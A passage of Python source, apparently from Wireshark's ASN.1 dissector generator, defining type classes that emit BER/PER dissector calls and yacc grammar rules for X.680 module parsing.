body = ectx.eth_fn_call('dissect_%(ER)s_null', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s'),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_null', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- NullValue ----------------------------------------------------
class NullValue (Value):
def to_str(self, ectx):
return 'NULL'
#--- RealType -----------------------------------------------------------------
class RealType (Type):
def to_python (self, ctx):
return 'asn1.REAL'
def eth_tname(self):
return 'REAL'
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_REAL')
def eth_ftype(self, ectx):
return ('FT_DOUBLE', 'BASE_NONE')
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_real', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s'),
('%(VAL_PTR)s',),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_real', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- BooleanType --------------------------------------------------------------
class BooleanType (Type):
def to_python (self, ctx):
return 'asn1.BOOLEAN'
def eth_tname(self):
return 'BOOLEAN'
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_BOOLEAN')
def eth_ftype(self, ectx):
return ('FT_BOOLEAN', 'BASE_NONE')
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_boolean', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s', '%(VAL_PTR)s'),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_boolean', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- OctetStringType ----------------------------------------------------------
class OctetStringType (Type):
def to_python (self, ctx):
return 'asn1.OCTSTRING'
def eth_tname(self):
if not self.HasConstraint():
return 'OCTET_STRING'
elif self.constr.type == 'Size':
return 'OCTET_STRING' + '_' + self.constr.eth_constrname()
else:
return '#' + self.type + '_' + str(id(self))
def eth_ftype(self, ectx):
return ('FT_BYTES', 'BASE_NONE')
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_OCTETSTRING')
def eth_need_pdu(self, ectx):
pdu = None
if self.HasContentsConstraint():
t = self.constr.GetContents(ectx)
if t and (ectx.default_containing_variant in ('_pdu', '_pdu_new')):
pdu = { 'type' : t,
'new' : ectx.default_containing_variant == '_pdu_new' }
return pdu
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
(pars['MIN_VAL'], pars['MAX_VAL'], pars['EXT']) = self.eth_get_size_constr(ectx)
if self.HasContentsConstraint():
pars['FN_VARIANT'] = ectx.default_containing_variant
t = self.constr.GetContents(ectx)
if t:
if pars['FN_VARIANT'] in ('_pdu', '_pdu_new'):
t = ectx.field[t]['ethname']
pars['TYPE_REF_PROTO'] = ''
pars['TYPE_REF_TNAME'] = t
pars['TYPE_REF_FN'] = 'dissect_%(TYPE_REF_TNAME)s'
else:
t = ectx.type[t]['ethname']
pars['TYPE_REF_PROTO'] = ectx.eth_type[t]['proto']
pars['TYPE_REF_TNAME'] = t
pars['TYPE_REF_FN'] = 'dissect_%(TYPE_REF_PROTO)s_%(TYPE_REF_TNAME)s'
else:
pars['TYPE_REF_FN'] = 'NULL'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
if (ectx.constraints_check and self.HasSizeConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_octet_string', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_octet_string', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s'),
('%(VAL_PTR)s',),))
elif (ectx.Per()):
if self.HasContentsConstraint():
body = ectx.eth_fn_call('dissect_%(ER)s_octet_string_containing%(FN_VARIANT)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(EXT)s', '%(TYPE_REF_FN)s',),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_octet_string', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(EXT)s', '%(VAL_PTR)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- CharacterStringType ------------------------------------------------------
class CharacterStringType (Type):
def eth_tname(self):
if not self.HasConstraint():
return self.eth_tsname()
elif self.constr.type == 'Size':
return self.eth_tsname() + '_' + self.constr.eth_constrname()
else:
return '#' + self.type + '_' + str(id(self))
def eth_ftype(self, ectx):
return ('FT_STRING', 'BASE_NONE')
class RestrictedCharacterStringType (CharacterStringType):
def to_python (self, ctx):
return 'asn1.' + self.eth_tsname()
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_' + self.eth_tsname())
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
(pars['MIN_VAL'], pars['MAX_VAL'], pars['EXT']) = self.eth_get_size_constr(ectx)
(pars['STRING_TYPE'], pars['STRING_TAG']) = (self.eth_tsname(), self.GetTTag(ectx)[1])
(pars['ALPHABET'], pars['ALPHABET_LEN']) = self.eth_get_alphabet_constr(ectx)
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
if (ectx.constraints_check and self.HasSizeConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_restricted_string', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(STRING_TAG)s'),
('%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_restricted_string', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(STRING_TAG)s'),
('%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s'),
('%(VAL_PTR)s',),))
elif (ectx.Per() and self.HasPermAlph()):
body = ectx.eth_fn_call('dissect_%(ER)s_restricted_character_string', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(EXT)s', '%(ALPHABET)s', '%(ALPHABET_LEN)s'),
('%(VAL_PTR)s',),))
elif (ectx.Per()):
if (self.eth_tsname() == 'GeneralString'):
body = ectx.eth_fn_call('dissect_%(ER)s_%(STRING_TYPE)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),))
elif (self.eth_tsname() == 'GeneralizedTime'):
body = ectx.eth_fn_call('dissect_%(ER)s_VisibleString', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(EXT)s',),))
elif (self.eth_tsname() == 'UTCTime'):
body = ectx.eth_fn_call('dissect_%(ER)s_VisibleString', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(EXT)s',),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_%(STRING_TYPE)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(EXT)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
class BMPStringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'BMPString'
class GeneralStringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'GeneralString'
class GraphicStringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'GraphicString'
class IA5StringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'IA5String'
class NumericStringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'NumericString'
class PrintableStringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'PrintableString'
class TeletexStringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'TeletexString'
class T61StringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'T61String'
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_TeletexString')
class UniversalStringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'UniversalString'
class UTF8StringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'UTF8String'
class VideotexStringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'VideotexString'
class VisibleStringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'VisibleString'
class ISO646StringType (RestrictedCharacterStringType):
def eth_tsname(self):
return 'ISO646String'
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_VisibleString')
class UnrestrictedCharacterStringType (CharacterStringType):
def to_python (self, ctx):
return 'asn1.UnrestrictedCharacterString'
def eth_tsname(self):
return 'CHARACTER_STRING'
#--- UsefulType ---------------------------------------------------------------
class GeneralizedTime (RestrictedCharacterStringType):
def eth_tsname(self):
return 'GeneralizedTime'
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_%(STRING_TYPE)s', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s'),))
return body
else:
return RestrictedCharacterStringType.eth_type_default_body(self, ectx, tname)
class UTCTime (RestrictedCharacterStringType):
def eth_tsname(self):
return 'UTCTime'
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_%(STRING_TYPE)s', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s'),))
return body
else:
return RestrictedCharacterStringType.eth_type_default_body(self, ectx, tname)
class ObjectDescriptor (RestrictedCharacterStringType):
def eth_tsname(self):
return 'ObjectDescriptor'
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = RestrictedCharacterStringType.eth_type_default_body(self, ectx, tname)
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_object_descriptor', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- ObjectIdentifierType -----------------------------------------------------
class ObjectIdentifierType (Type):
def to_python (self, ctx):
return 'asn1.OBJECT_IDENTIFIER'
def eth_tname(self):
return 'OBJECT_IDENTIFIER'
def eth_ftype(self, ectx):
return ('FT_OID', 'BASE_NONE')
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_OID')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
pars['FN_VARIANT'] = ectx.default_oid_variant
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_object_identifier%(FN_VARIANT)s', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_object_identifier%(FN_VARIANT)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- ObjectIdentifierValue ----------------------------------------------------
class ObjectIdentifierValue (Value):
def get_num(self, path, val):
return str(oid_names.get(path + '/' + val, val))
def to_str(self, ectx):
out = ''
path = ''
first = True
sep = ''
for v in self.comp_list:
if isinstance(v, Node) and (v.type == 'name_and_number'):
vstr = v.number
elif v.isdigit():
vstr = v
else:
vstr = self.get_num(path, v)
if not first and not vstr.isdigit():
vstr = ectx.value_get_val(vstr)
if first:
if vstr.isdigit():
out += '"' + vstr
else:
out += ectx.value_get_eth(vstr) + '"'
else:
out += sep + vstr
path += sep + vstr
first = False
sep = '.'
out += '"'
return out
def get_dep(self):
v = self.comp_list[0]
if isinstance(v, Node) and (v.type == 'name_and_number'):
return None
elif v.isdigit():
return None
else:
vstr = self.get_num('', v)
if vstr.isdigit():
return None
else:
return vstr
class NamedNumber(Node):
def to_python (self, ctx):
return "('%s',%s)" % (self.ident, self.val)
class NamedNumListBase(Node):
def to_python (self, ctx):
return "asn1.%s_class ([%s])" % (self.asn1_typ,",".join (
[x.to_python (ctx) for x in self.named_list]))
#--- RelativeOIDType ----------------------------------------------------------
class RelativeOIDType (Type):
def eth_tname(self):
return 'RELATIVE_OID'
def eth_ftype(self, ectx):
return ('FT_REL_OID', 'BASE_NONE')
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_RELATIVE_OID')
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
pars['FN_VARIANT'] = ectx.default_oid_variant
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
body = ectx.eth_fn_call('dissect_%(ER)s_relative_oid%(FN_VARIANT)s', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
elif (ectx.Per()):
body = ectx.eth_fn_call('dissect_%(ER)s_relative_oid%(FN_VARIANT)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- IntegerType --------------------------------------------------------------
class IntegerType (Type):
def to_python (self, ctx):
return "asn1.INTEGER_class ([%s])" % (",".join (
[x.to_python (ctx) for x in self.named_list]))
def add_named_value(self, ident, val):
e = NamedNumber(ident = ident, val = val)
if not self.named_list:
self.named_list = []
self.named_list.append(e)
def eth_tname(self):
if self.named_list:
return Type.eth_tname(self)
if not self.HasConstraint():
return 'INTEGER'
elif self.constr.type == 'SingleValue' or self.constr.type == 'ValueRange':
return 'INTEGER' + '_' + self.constr.eth_constrname()
else:
return 'INTEGER' + '_' + self.constr.eth_tname()
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_INTEGER')
def eth_ftype(self, ectx):
if self.HasConstraint():
if not self.constr.IsNegativ():
if self.constr.Needs64b(ectx):
return ('FT_UINT64', 'BASE_DEC')
else:
return ('FT_UINT32', 'BASE_DEC')
if self.constr.Needs64b(ectx):
return ('FT_INT64', 'BASE_DEC')
return ('FT_INT32', 'BASE_DEC')
def eth_strings(self):
if (self.named_list):
return '$$'
else:
return 'NULL'
def eth_has_vals(self):
if (self.named_list):
return True
else:
return False
def get_vals(self, ectx):
vals = []
for e in (self.named_list):
vals.append((int(e.val), e.ident))
return vals
def eth_type_vals(self, tname, ectx):
if not self.eth_has_vals(): return ''
out = '\n'
vals = self.get_vals(ectx)
out += ectx.eth_vals(tname, vals)
return out
def reg_enum_vals(self, tname, ectx):
vals = self.get_vals(ectx)
for (val, id) in vals:
ectx.eth_reg_value(id, self, val, ethname=ectx.eth_enum_item(tname, id))
def eth_type_enum(self, tname, ectx):
if not self.eth_has_enum(tname, ectx): return ''
out = '\n'
vals = self.get_vals(ectx)
out += ectx.eth_enum(tname, vals)
return out
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
if self.HasValueConstraint():
(pars['MIN_VAL'], pars['MAX_VAL'], pars['EXT']) = self.eth_get_value_constr(ectx)
if (pars['FN_VARIANT'] == '') and self.constr.Needs64b(ectx):
if ectx.Ber(): pars['FN_VARIANT'] = '64'
else: pars['FN_VARIANT'] = '_64b'
return pars
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
if (ectx.constraints_check and self.HasValueConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_integer%(FN_VARIANT)s', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(HF_INDEX)s', '%(VAL_PTR)s',),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_integer%(FN_VARIANT)s', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s', '%(HF_INDEX)s'),
('%(VAL_PTR)s',),))
elif (ectx.Per() and not self.HasValueConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_integer%(FN_VARIANT)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s', '%(VAL_PTR)s'),))
elif (ectx.Per() and self.HasValueConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_integer%(FN_VARIANT)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(VAL_PTR)s', '%(EXT)s'),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- BitStringType ------------------------------------------------------------
class BitStringType (Type):
def to_python (self, ctx):
return "asn1.BITSTRING_class ([%s])" % (",".join (
[x.to_python (ctx) for x in self.named_list]))
def eth_tname(self):
if self.named_list:
return Type.eth_tname(self)
elif not self.HasConstraint():
return 'BIT_STRING'
elif self.constr.IsSize():
return 'BIT_STRING' + '_' + self.constr.eth_constrname()
else:
return '#' + self.type + '_' + str(id(self))
def GetTTag(self, ectx):
return ('BER_CLASS_UNI', 'BER_UNI_TAG_BITSTRING')
def eth_ftype(self, ectx):
return ('FT_BYTES', 'BASE_NONE')
def eth_need_tree(self):
return self.named_list
def eth_need_pdu(self, ectx):
pdu = None
if self.HasContentsConstraint():
t = self.constr.GetContents(ectx)
if t and (ectx.default_containing_variant in ('_pdu', '_pdu_new')):
pdu = { 'type' : t,
'new' : ectx.default_containing_variant == '_pdu_new' }
return pdu
def eth_named_bits(self):
bits = []
if (self.named_list):
for e in (self.named_list):
bits.append((int(e.val), e.ident))
return bits
def eth_type_default_pars(self, ectx, tname):
pars = Type.eth_type_default_pars(self, ectx, tname)
pars['LEN_PTR'] = 'NULL'
(pars['MIN_VAL'], pars['MAX_VAL'], pars['EXT']) = self.eth_get_size_constr(ectx)
if 'ETT_INDEX' not in pars:
pars['ETT_INDEX'] = '-1'
pars['TABLE'] = 'NULL'
if self.eth_named_bits():
pars['TABLE'] = '%(PROTOP)s%(TNAME)s_bits'
if self.HasContentsConstraint():
pars['FN_VARIANT'] = ectx.default_containing_variant
t = self.constr.GetContents(ectx)
if t:
if pars['FN_VARIANT'] in ('_pdu', '_pdu_new'):
t = ectx.field[t]['ethname']
pars['TYPE_REF_PROTO'] = ''
pars['TYPE_REF_TNAME'] = t
pars['TYPE_REF_FN'] = 'dissect_%(TYPE_REF_TNAME)s'
else:
t = ectx.type[t]['ethname']
pars['TYPE_REF_PROTO'] = ectx.eth_type[t]['proto']
pars['TYPE_REF_TNAME'] = t
pars['TYPE_REF_FN'] = 'dissect_%(TYPE_REF_PROTO)s_%(TYPE_REF_TNAME)s'
else:
pars['TYPE_REF_FN'] = 'NULL'
return pars
def eth_type_default_table(self, ectx, tname):
#print "eth_type_default_table(tname='%s')" % (tname)
table = ''
bits = self.eth_named_bits()
if (bits and ectx.Ber()):
table = ectx.eth_bits(tname, bits)
return table
def eth_type_default_body(self, ectx, tname):
if (ectx.Ber()):
if (ectx.constraints_check and self.HasSizeConstraint()):
body = ectx.eth_fn_call('dissect_%(ER)s_constrained_bitstring', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(TABLE)s', '%(HF_INDEX)s', '%(ETT_INDEX)s',),
('%(VAL_PTR)s',),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_bitstring', ret='offset',
par=(('%(IMPLICIT_TAG)s', '%(ACTX)s', '%(TREE)s', '%(TVB)s', '%(OFFSET)s'),
('%(TABLE)s', '%(HF_INDEX)s', '%(ETT_INDEX)s',),
('%(VAL_PTR)s',),))
elif (ectx.Per()):
if self.HasContentsConstraint():
body = ectx.eth_fn_call('dissect_%(ER)s_bit_string_containing%(FN_VARIANT)s', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(EXT)s', '%(TYPE_REF_FN)s'),))
else:
body = ectx.eth_fn_call('dissect_%(ER)s_bit_string', ret='offset',
par=(('%(TVB)s', '%(OFFSET)s', '%(ACTX)s', '%(TREE)s', '%(HF_INDEX)s'),
('%(MIN_VAL)s', '%(MAX_VAL)s', '%(EXT)s', '%(VAL_PTR)s', '%(LEN_PTR)s'),))
else:
body = '#error Can not decode %s' % (tname)
return body
#--- BStringValue ------------------------------------------------------------
bstring_tab = {
'0000' : '0',
'0001' : '1',
'0010' : '2',
'0011' : '3',
'0100' : '4',
'0101' : '5',
'0110' : '6',
'0111' : '7',
'1000' : '8',
'1001' : '9',
'1010' : 'A',
'1011' : 'B',
'1100' : 'C',
'1101' : 'D',
'1110' : 'E',
'1111' : 'F',
}
class BStringValue (Value):
def to_str(self, ectx):
v = self.val[1:-2]
if len(v) % 8:
v += '0' * (8 - len(v) % 8)
vv = '0x'
for i in (list(range(0, len(v), 4))):
vv += bstring_tab[v[i:i+4]]
return vv
#--- HStringValue ------------------------------------------------------------
class HStringValue (Value):
def to_str(self, ectx):
vv = '0x'
vv += self.val[1:-2]
return vv
def __int__(self):
return int(self.val[1:-2], 16)
#--- FieldSpec ----------------------------------------------------------------
class FieldSpec (Node):
def __init__(self,*args, **kw) :
self.name = None
Node.__init__ (self,*args, **kw)
def SetName(self, name):
self.name = name
def get_repr(self):
return ['#UNSUPPORTED_' + self.type]
def fld_repr(self):
repr = [self.name]
repr.extend(self.get_repr())
return repr
class TypeFieldSpec (FieldSpec):
def get_repr(self):
return []
class FixedTypeValueFieldSpec (FieldSpec):
def get_repr(self):
if isinstance(self.typ, Type_Ref):
repr = ['TypeReference', self.typ.val]
else:
repr = [self.typ.type]
return repr
class VariableTypeValueFieldSpec (FieldSpec):
def get_repr(self):
return ['_' + self.type]
class FixedTypeValueSetFieldSpec (FieldSpec):
def get_repr(self):
return ['_' + self.type]
class ObjectFieldSpec (FieldSpec):
def get_repr(self):
return ['ClassReference', self.cls.val]
class ObjectSetFieldSpec (FieldSpec):
def get_repr(self):
return ['ClassReference', self.cls.val]
#==============================================================================
def p_module_list_1 (t):
'module_list : module_list ModuleDefinition'
t[0] = t[1] + [t[2]]
def p_module_list_2 (t):
'module_list : ModuleDefinition'
t[0] = [t[1]]
#--- ITU-T Recommendation X.680 -----------------------------------------------
# 11 ASN.1 lexical items --------------------------------------------------------
# 11.2 Type references
def p_type_ref (t):
'type_ref : UCASE_IDENT'
t[0] = Type_Ref(val=t[1])
# 11.3 Identifiers
def p_identifier (t):
'identifier : LCASE_IDENT'
t[0] = t[1]
# 11.4 Value references
# cause reduce/reduce conflict
#def p_valuereference (t):
# 'valuereference : LCASE_IDENT'
# t[0] = Value_Ref(val=t[1])
# 11.5 Module references
def p_modulereference (t):
'modulereference : UCASE_IDENT'
t[0] = t[1]
# 12 Module definition --------------------------------------------------------
# 12.1
def p_ModuleDefinition (t):
'ModuleDefinition : ModuleIdentifier DEFINITIONS TagDefault ASSIGNMENT ModuleBegin BEGIN ModuleBody END'
t[0] = Module (ident = t[1], tag_def = t[3], body = t[7])
def p_ModuleBegin (t):
'ModuleBegin : '
if t[-4].val == 'Remote-Operations-Information-Objects':
x880_module_begin()
def p_TagDefault_1 (t):
'''TagDefault : EXPLICIT TAGS
| IMPLICIT TAGS
| AUTOMATIC TAGS '''
t[0] = Default_Tags (dfl_tag = t[1])
def p_TagDefault_2 (t):
'TagDefault : '
# 12.2 The "TagDefault" is taken as EXPLICIT TAGS if it is "empty".
t[0] = Default_Tags (dfl_tag = 'EXPLICIT')
def p_ModuleIdentifier_1 (t):
'ModuleIdentifier : modulereference DefinitiveIdentifier' # name, oid
t [0] = Node('module_ident', val = t[1], ident = t[2])
def p_ModuleIdentifier_2 (t):
'ModuleIdentifier : modulereference' # name, oid
t [0] = Node('module_ident', val = t[1], ident = None)
def p_DefinitiveIdentifier (t):
'DefinitiveIdentifier : ObjectIdentifierValue'
t[0] = t[1]
#def p_module_ref (t):
# 'module_ref : UCASE_IDENT'
# t[0] = t[1]
def p_ModuleBody_1 (t):
'ModuleBody : Exports Imports AssignmentList'
t[0] = Module_Body (exports = t[1], imports = t[2], assign_list = t[3])
def p_ModuleBody_2 (t):
'ModuleBody : '
t[0] = Node ('module_body', exports = [], imports = [], assign_list = [])
def p_Exports_1 (t):
'Exports : EXPORTS syms_exported SEMICOLON'
t[0] = t[2]
def p_Exports_2 (t):
'Exports : EXPORTS ALL SEMICOLON'
t[0] = [ 'ALL' ]
def p_Exports_3 (t):
'Exports : '
t[0] = [ 'ALL' ]
def p_syms_exported_1 (t):
'syms_exported : exp_sym_list'
t[0] = t[1]
def p_syms_exported_2 (t):
'syms_exported : '
t[0] = []
def p_exp_sym_list_1 (t):
'exp_sym_list : Symbol'
t[0] = [t[1]]
def p_exp_sym_list_2 (t):
'exp_sym_list : exp_sym_list COMMA Symbol'
t[0] = t[1] + [t[3]]
def p_Imports_1 (t):
'Imports : importsbegin IMPORTS SymbolsImported SEMICOLON'
t[0] = t[3]
global lcase_ident_assigned
lcase_ident_assigned = {}
def p_importsbegin (t):
'importsbegin : '
global lcase_ident_assigned
global g_conform
lcase_ident_assigned = {}
lcase_ident_assigned.update(g_conform.use_item('ASSIGNED_ID', 'OBJECT_IDENTIFIER'))
def p_Imports_2 (t):
'Imports : '
t[0] = []
def p_SymbolsImported_1(t):
'SymbolsImported : '
t[0] = []
def p_SymbolsImported_2 (t):
'SymbolsImported : SymbolsFromModuleList'
t[0] = t[1]
def p_SymbolsFromModuleList_1 (t):
'SymbolsFromModuleList : SymbolsFromModuleList SymbolsFromModule'
t[0] = t[1] + [t[2]]
def p_SymbolsFromModuleList_2 (t):
'SymbolsFromModuleList : SymbolsFromModule'
t[0] = [t[1]]
def p_SymbolsFromModule (t):
'SymbolsFromModule : SymbolList FROM GlobalModuleReference'
t[0] = Node ('SymbolList', symbol_list = t[1], module = t[3])
for s in (t[0].symbol_list):
if (isinstance(s, Value_Ref)): lcase_ident_assigned[s.val] = t[3]
import_symbols_from_module(t[0].module, t[0].symbol_list)
def import_symbols_from_module(module, symbol_list):
if module.val == 'Remote-Operations-Information-Objects':
for i in range(len(symbol_list)):
s = symbol_list[i]
if isinstance(s, Type_Ref) or isinstance(s, Class_Ref):
x880_import(s.val)
if isinstance(s, Type_Ref) and is_class_ident(s.val):
symbol_list[i] = Class_Ref (val = s.val)
return
for i in range(len(symbol_list)):
s = symbol_list[i]
if isinstance(s, Type_Ref) and is_class_ident("$%s$%s" % (module.val, s.val)):
import_class_from_module(module.val, s.val)
if isinstance(s, Type_Ref) and is_class_ident(s.val):
symbol_list[i] = Class_Ref (val = s.val)
def p_GlobalModuleReference (t):
'GlobalModuleReference : modulereference AssignedIdentifier'
t [0] = Node('module_ident', val = t[1], ident = t[2])
def p_AssignedIdentifier_1 (t):
'AssignedIdentifier : ObjectIdentifierValue'
t[0] = t[1]
def p_AssignedIdentifier_2 (t):
'AssignedIdentifier : LCASE_IDENT_ASSIGNED'
t[0] = t[1]
def p_AssignedIdentifier_3 (t):
'AssignedIdentifier : '
pass
def p_SymbolList_1 (t):
'SymbolList : Symbol'
t[0] = [t[1]]
def p_SymbolList_2 (t):
'SymbolList : SymbolList COMMA Symbol'
t[0] = t[1] + [t[3]]
def p_Symbol (t):
'''Symbol : Reference
| ParameterizedReference'''
t[0] = t[1]
def p_Reference_1 (t):
'''Reference : type_ref
| objectclassreference '''
t[0] = t[1]
def p_Reference_2 (t):
'''Reference : LCASE_IDENT_ASSIGNED
| identifier ''' # instead of valuereference wich causes reduce/reduce conflict
